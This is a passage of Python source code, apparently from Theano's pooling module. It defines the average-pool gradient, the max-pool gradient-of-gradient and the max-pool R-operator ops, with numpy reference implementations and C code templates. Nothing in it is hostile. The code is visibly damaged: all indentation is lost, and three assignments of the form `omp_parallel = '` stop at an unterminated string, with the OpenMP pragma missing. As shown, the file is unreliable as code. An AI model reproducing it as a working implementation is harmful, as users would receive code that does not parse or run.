r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(gz)s * gz;
if (%(total_ndim)s == 4)
{
// the maximum value
maximum = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])))[0];
// the gradient corresponding to this maximum value in z
gz = ((dtype_%(gz)s*)(PyArray_GETPTR4(%(gz)s, o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
}
else
{
// the maximum value
maximum = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s,o_idx)))[0];
// the gradient corresponding to this maximum value in z
gz = ((dtype_%(gz)s*)(PyArray_GetPtr(%(gz)s, o_idx)));
}
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(x)s a;
dtype_%(gx)s * gx;
if (%(total_ndim)s == 4)
{
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
gx = ((dtype_%(gx)s*)(PyArray_GETPTR4(%(gx)s, i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
}
else
{
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
gx = ((dtype_%(gx)s*)(PyArray_GetPtr(%(gx)s, i_idx)));
}
if (a == maximum){
gx[0] = gx[0] + gz[0];
}
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
def c_code_cache_version(self):
return (0, 10, self.openmp)
class AveragePoolGrad(PoolGrad):
# ignore_border is used for perform, but not c code. No need in params_type
def __init__(self, ignore_border, mode='average_inc_pad', ndim=2):
assert mode in ['sum', 'average_inc_pad', 'average_exc_pad']
PoolGrad.__init__(self, ignore_border, mode, ndim)
# There is an extra dummy parameter to match the parameter count
# of MaxPoolGrad. They have to keep the same interface because of
# the DownsampleFactorMaxGrad trick to keep old scripts working
# (see downsample.py for details on this).
def make_node(self, x, gz, ws, stride=None, pad=None, dummy=None):
# make_node should only be called by the grad function of
# Pool, so these asserts should not fail.
x = tensor.as_tensor_variable(x)
gz = tensor.as_tensor_variable(gz)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert isinstance(x, Variable) and x.ndim >= nd
assert isinstance(gz, Variable) and gz.ndim >= nd
assert isinstance(ws, Variable) and ws.ndim == 1
assert isinstance(stride, Variable) and stride.ndim == 1
assert x.ndim == gz.ndim >= nd
assert isinstance(pad, Variable) and pad.ndim == 1
if ws.dtype not in tensor.int_dtypes:
raise TypeError('Pool downsample parameters must be ints.')
if stride.dtype not in tensor.int_dtypes:
raise TypeError('Stride parameters must be ints.')
if pad.dtype not in tensor.int_dtypes:
raise TypeError('Padding parameters must be ints.')
return Apply(self, [x, gz, ws, stride, pad], [x.type()])
def perform(self, node, inp, out):
x, gz, ws, stride, pad = inp
gx_stg, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'AveragePoolGrad requires input with {} or more dimensions'.format(nd))
if self.mode == 'average_exc_pad' and max(pad) != 0:
raise NotImplementedError()
z_shape = self.out_shape(x.shape, ws, self.ignore_border, stride, pad, nd)
if (gx_stg[0] is None) or (gx_stg[0].shape != z_shape):
gx_stg[0] = np.empty(z_shape, dtype=x.dtype)
zz = gx_stg[0]
# size of pooling output
pool_out_shp = zz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
inc_pad = self.mode == 'average_inc_pad'
sum_mode = self.mode == 'sum'
# initialize the padded output
gx = np.zeros((x.shape[:-nd] + img_shp), dtype=x.dtype)
# precompute the region boundaries and sizes for each dimension
region_slices = [[] for i in xrange(nd)]
region_sizes = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
if sum_mode or inc_pad:
start = j * stride[i]
else:
start = builtins.max(j * stride[i], pad[i])
end = builtins.min(start + ws[i], img_shp[i])
region_slices[i].append(slice(start, end))
region_sizes[i].append(end - start)
# iterate over non-pooling dimensions
region_slice = [None] * nd
for k in np.ndindex(*x.shape[:-nd]):
gzk = gz[k]
gxk = gx[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
region_size = 1
for i in xrange(nd):
region_slice[i] = region_slices[i][r[i]]
region_size *= region_sizes[i][r[i]]
if sum_mode:
val = gzk[r]
else:
# divide by region size
val = gzk[r] / region_size
gxk[region_slice] += val
# unpad the image
gx = gx[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))]
gx_stg[0] = gx
def grad(self, inp, grads):
x, gz, ws, stride, pad = inp
ggx, = grads
return ([theano.tensor.zeros_like(x),
Pool(ignore_border=self.ignore_border,
ndim=self.ndim, mode=self.mode)(ggx,
ws, stride, pad)] + [DisconnectedType()() for i in inp[2:]])
def connection_pattern(self, node):
return [[1], [1], [0], [0], [0]]
def c_code(self, node, name, inp, out, sub):
x, gz, ws, stride, pad = inp
gx, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
inc_pad = int(self.mode == 'average_inc_pad')
sum_mode = int(self.mode == 'sum')
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '
else:
omp_parallel = ''
ccode = """
// sanity checks
int x_typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
int gz_typenum = PyArray_ObjectType((PyObject*)%(gz)s, 0);
if (x_typenum != gz_typenum)
{
PyErr_SetString(PyExc_ValueError, "input types must all match");
%(fail)s;
}
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(gz)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "gz must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
z[i] = PyArray_DIMS(%(gz)s)[%(non_pool_ndim)s + i];
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
if (!%(inc_pad)s && !%(sum_mode)s && nonzero_padding)
{
PyErr_SetString(PyExc_ValueError,
"padding must be zero for average_exc_pad");
%(fail)s;
}
// allocating memory for output, if necessary
int mem_nec;
mem_nec = 0;
if ((!%(gx)s) || !PyArray_ISCONTIGUOUS(%(gx)s)
|| *PyArray_DIMS(%(gx)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(total_ndim)s; i++)
{
if (PyArray_DIMS(%(gx)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
Py_XDECREF(%(gx)s);
%(gx)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(x)s), x_typenum,0);
}
else {
PyArray_FILLWBYTE(%(gx)s, 0);
}
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// padded region size
int r_pad_width[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] =o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
if (!%(sum_mode)s && !%(inc_pad)s && r_st[%(i)s] < pd[%(i)s])
{
r_st[%(i)s] = pd[%(i)s];
}
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
r_pad_width[%(i)s] = r_end[%(i)s] - r_st[%(i)s];
// from padded_img space to img space
r_st[%(i)s] = r_st[%(i)s] - pd[%(i)s] > 0 ? r_st[%(i)s] - pd[%(i)s] : 0;
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] - pd[%(i)s] ? r[%(i)s] - 2 * pd[%(i)s] : r_end[%(i)s] - pd[%(i)s];
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, sum_mode=sum_mode, inc_pad=inc_pad, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(gz)s * gz;
dtype_%(gz)s val;
if (%(total_ndim)s == 4)
{
// the gradient for this region
gz = ((dtype_%(gz)s*)(PyArray_GETPTR4(%(gz)s, o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
}
else
{
// the gradient for this region
gz = ((dtype_%(gz)s*)(PyArray_GetPtr(%(gz)s, o_idx)));
}
// compute the contribution
if (%(sum_mode)s)
{
val = gz[0];
}
else
{
val = gz[0] / (%(region_size)s);
}
"""
region_size = ' * '.join('r_pad_width[%d]' % i for i in xrange(nd))
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(gx)s * gx;
if (%(total_ndim)s == 4)
{
gx = ((dtype_%(gx)s*)(PyArray_GETPTR4(%(gx)s, i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
}
else
{
gx = ((dtype_%(gx)s*)(PyArray_GetPtr(%(gx)s, i_idx)));
}
gx[0] = gx[0] + val;
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
def c_code_cache_version(self):
return (0, 3, self.openmp)
class DownsampleFactorMaxGradGrad(OpenMPOp):
__props__ = ('ignore_border', 'mode', 'ndim')
def __init__(self, ignore_border, mode='max', ndim=2, openmp=None):
self.ndim = ndim
self.ignore_border = ignore_border
self.mode = mode
super(DownsampleFactorMaxGradGrad, self).__init__(openmp=openmp)
assert self.mode == 'max'
def make_node(self, x, maxout, gz, ws, stride=None, pad=None):
# make_node should only be called by the grad function of
# MaxPoolGrad, so these asserts should not fail.
x = tensor.as_tensor_variable(x)
maxout = tensor.as_tensor_variable(maxout)
gz = tensor.as_tensor_variable(gz)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
elif isinstance(pad, (tuple, list)):
if max(pad) != 0 and not self.ignore_border:
raise NotImplementedError(
'padding works only with ignore_border=True')
if isinstance(ws, (tuple, list)):
if any(pad[i] >= ws[i] for i in range(nd)):
raise NotImplementedError(
'padding must be smaller than strides')
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert ws.ndim == 1
assert stride.ndim == 1
assert pad.ndim == 1
assert x.ndim == maxout.ndim == gz.ndim >= nd
if ws.dtype not in tensor.int_dtypes:
raise TypeError('Pool downsample parameters must be ints.')
if stride.dtype not in tensor.int_dtypes:
raise TypeError('Stride parameters must be ints.')
if pad.dtype not in tensor.int_dtypes:
raise TypeError('Padding parameters must be ints.')
return Apply(self, [x, maxout, gz, ws, stride, pad], [x.type()])
def perform(self, node, inp, out):
x, maxout, ggx, ws, stride, pad = inp
z, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'DownsampleFactorMaxGradGrad requires input '
'with {} or more dimensions'.format(nd))
if (z[0] is None) or (z[0].shape != maxout.shape):
z[0] = np.zeros(maxout.shape, dtype=x.dtype)
ggz = z[0] # grad wrt maxout_grad has the same shape as maxout
# size of pooling output
pool_out_shp = ggz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
# pad the image and its gradients
if max(pad) > 0:
y_padded = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y_padded[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
ggx_padded = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
ggx_padded[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = ggx
else:
y_padded = x
ggx_padded = ggx
# precompute the region boundaries for each dimension
region_ranges = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = j * stride[i]
end = builtins.min(start + ws[i], img_shp[i])
region_ranges[i].append(xrange(start, end))
# iterate over non-pooling dimensions
for k in np.ndindex(*x.shape[:-nd]):
ggxk = ggx_padded[k]
ggzk = ggz[k]
yk = y_padded[k]
maxoutk = maxout[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
# iterate inside region
maxout_value = maxoutk[r]
for c in itertools.product(*[region_ranges[i][r[i]]
for i in xrange(nd)]):
if maxout_value == yk[c]:
ggzk[r] += ggxk[c]
def infer_shape(self, node, in_shapes):
return [in_shapes[1]]
def grad(self, inp, grads):
x, maxout, ggx, ws, stride, pad = inp
gz, = grads
return [theano.tensor.zeros_like(x),
theano.tensor.zeros_like(maxout),
MaxPoolGrad(ignore_border=self.ignore_border,
ndim=self.ndim)(x, maxout, gz,
ws, stride, pad),
DisconnectedType()(),
DisconnectedType()(),
DisconnectedType()()]
def connection_pattern(self, node):
return [[1], [1], [1], [0], [0], [0]]
def c_code(self, node, name, inp, out, sub):
if self.mode != 'max':
raise theano.gof.utils.MethodNotDefined()
x, maxout, ggx, ws, stride, pad = inp
z, = out # the grad of grad
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '
else:
omp_parallel = ''
ccode = """
int z_typenum = PyArray_ObjectType((PyObject*)%(maxout)s, 0);
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
z[i] = PyArray_DIMS(%(maxout)s)[%(non_pool_ndim)s + i];
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
}
// allocating memory for output, if necessary
int mem_nec;
mem_nec = 0;
if ((!%(z)s) || !PyArray_ISCONTIGUOUS(%(z)s)
|| *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(total_ndim)s; i++)
{
if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(maxout)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
Py_XDECREF(%(z)s);
%(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(maxout)s), z_typenum,0);
}
else {
PyArray_FILLWBYTE(%(z)s, 0);
}
dtype_%(maxout)s maximum; // temp var for maximum value in a region
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod;
non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(z)s * z;
if (%(total_ndim)s == 4)
{
// the maximum value
maximum = ((dtype_%(maxout)s*)(PyArray_GETPTR4(%(maxout)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])))[0];
// z at this position
z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
}
else
{
// the maximum value
maximum = ((dtype_%(maxout)s*)(PyArray_GetPtr(%(maxout)s,o_idx)))[0];
// z at this position
z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s,o_idx)));
}
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(x)s a;
dtype_%(ggx)s * ggx;
if (%(total_ndim)s == 4)
{
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
ggx = ((dtype_%(ggx)s*)(PyArray_GETPTR4(%(ggx)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
}
else
{
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
ggx = ((dtype_%(ggx)s*)(PyArray_GetPtr(%(ggx)s,i_idx)));
}
if (a == maximum){
z[0] += ggx[0];
}
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
"""
return ccode % locals()
def c_code_cache_version(self):
return (0, 4, self.openmp)
class MaxPoolRop(OpenMPOp):
__props__ = ('ignore_border', 'mode', 'ndim')
params_type = ParamsType(ignore_border=bool_t,)
def __init__(self, ignore_border=False, mode='max', ndim=2, openmp=None):
super(MaxPoolRop, self).__init__(openmp=openmp)
self.ndim = ndim
self.ignore_border = ignore_border
self.mode = mode
assert mode == 'max'
def make_node(self, x, eval_point, ws, stride=None, pad=None):
# TODO: consider restricting the dtype?
x = tensor.as_tensor_variable(x)
eval_point = tensor.as_tensor_variable(eval_point)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
elif isinstance(pad, (tuple, list)):
if max(pad) != 0 and not self.ignore_border:
raise NotImplementedError(
'padding works only with ignore_border=True')
if isinstance(ws, (tuple, list)):
if any(pad[i] >= ws[i] for i in range(nd)):
raise NotImplementedError(
'padding must be smaller than strides')
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert ws.ndim == 1
assert stride.ndim == 1
assert pad.ndim == 1
if x.type.ndim < nd:
raise TypeError()
if not ws.dtype.startswith('int'):
raise TypeError('Pool downsample parameters must be ints.')
if not stride.dtype.startswith('int'):
raise TypeError('Stride parameters must be ints.')
if not pad.dtype.startswith('int'):
raise TypeError('Padding parameters must be ints.')
# If the input shape are broadcastable we can have 0 in the output shape
broad = x.broadcastable[:-nd] + (False,) * nd
out = tensor.TensorType(eval_point.dtype, broad)
return gof.Apply(self, [x, eval_point, ws, stride, pad], [out()])
def perform(self, node, inp, out, params):
x, ex, ws, stride, pad = inp
z, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'Pool requires input with {} or more dimensions'.format(nd))
z_shape = Pool.out_shape(x.shape, ws, params.ignore_border, stride, pad, nd)
if not self.ignore_border:
assert all(z > 0 for z in z_shape[-nd:])
if (z[0] is None) or (z[0].shape != z_shape):
z[0] = np.empty(z_shape, dtype=x.dtype)
zz = z[0]
# size of pooling output
pool_out_shp = zz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
inc_pad = self.mode == 'average_inc_pad'
# pad the image and the eval point
if max(pad) != 0:
y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
ey = np.zeros(ex.shape[:-nd] + img_shp, dtype=ex.dtype)
ey[(slice(None),) * (len(ex.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = ex
else:
y = x
ey = ex
# precompute the region boundaries for each dimension
region_slices = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = j * stride[i]
end = builtins.min(start + ws[i], img_shp[i])
if not inc_pad:
start = builtins.max(start, pad[i])
end = builtins.min(end, img_shp[i] - pad[i])
region_slices[i].append(slice(start, end))
# iterate over non-pooling dimensions
for k in np.ndindex(*x.shape[:-nd]):
zzk = zz[k]
yk = y[k]
eyk = ey[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
# current slice in padded input
ykslice = yk[[region_slices[i][r[i]] for i in xrange(nd)]]
# current slice in eval points
eykslice = eyk[[region_slices[i][r[i]] for i in xrange(nd)]]
# indices of maximum
idx = np.unravel_index(np.argmax(ykslice), ykslice.shape)
zzk[r] = eykslice[idx]
def c_headers(self):
headers = ['<algorithm>']
headers += super(MaxPoolRop, self).c_headers()
return headers
def c_code(self, node, name, inp, out, sub):
if self.mode != 'max':
raise theano.gof.utils.MethodNotDefined()
x, ex, ws, stride, pad = inp
z, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
params = sub['params']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '
else:
omp_parallel = ''
ccode = """
int typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(ex)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "eval_point must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
if (!%(params)s->ignore_border && nonzero_padding)
{
PyErr_SetString(PyExc_ValueError,
"padding must be zero when ignore border is False");
%(fail)s;
}
if (%(params)s->ignore_border)
{
for (int i=0; i<%(nd)s; i++)
{
// '/' in C is different from '/' in python
if (r[i] - ws[i] < 0)
{
z[i] = 0;
}
else
{
z[i] = (r[i] - ws[i]) / st[i] + 1;
}
}
}
else
{
for (int i=0; i<%(nd)s; i++)
{
// decide how many rows/cols the output has
if (st[i] >= ws[i])
{
z[i] = (r[i] - 1) / st[i] + 1;
}
else
{
z[i] = std::max(0, (r[i] - 1 - ws[i] + st[i]) / st[i]) + 1;
}
assert(z[i] > 0);
}
}
// memory allocation of z if necessary
int mem_nec;
mem_nec = 0;
if ((!%(z)s) || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(non_pool_ndim)s; i++)
{
if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (!mem_nec)
{
for (int i=0; i<%(nd)s; i++)
{
if (PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i] != z[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
if (%(z)s) Py_XDECREF(%(z)s);
npy_intp dims[%(total_ndim)s];
for (int i=0; i<%(non_pool_ndim)s; i++)
{
dims[i] = PyArray_DIMS(%(x)s)[i];
}
for (int i=0; i<%(nd)s; i++)
{
dims[%(non_pool_ndim)s + i] = z[i];
}
//TODO: zeros not necessary
%(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, dims, typenum,0);
}
// initialize temp var for the value in a region
dtype_%(x)s collector;
dtype_%(ex)s eval_collector;
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
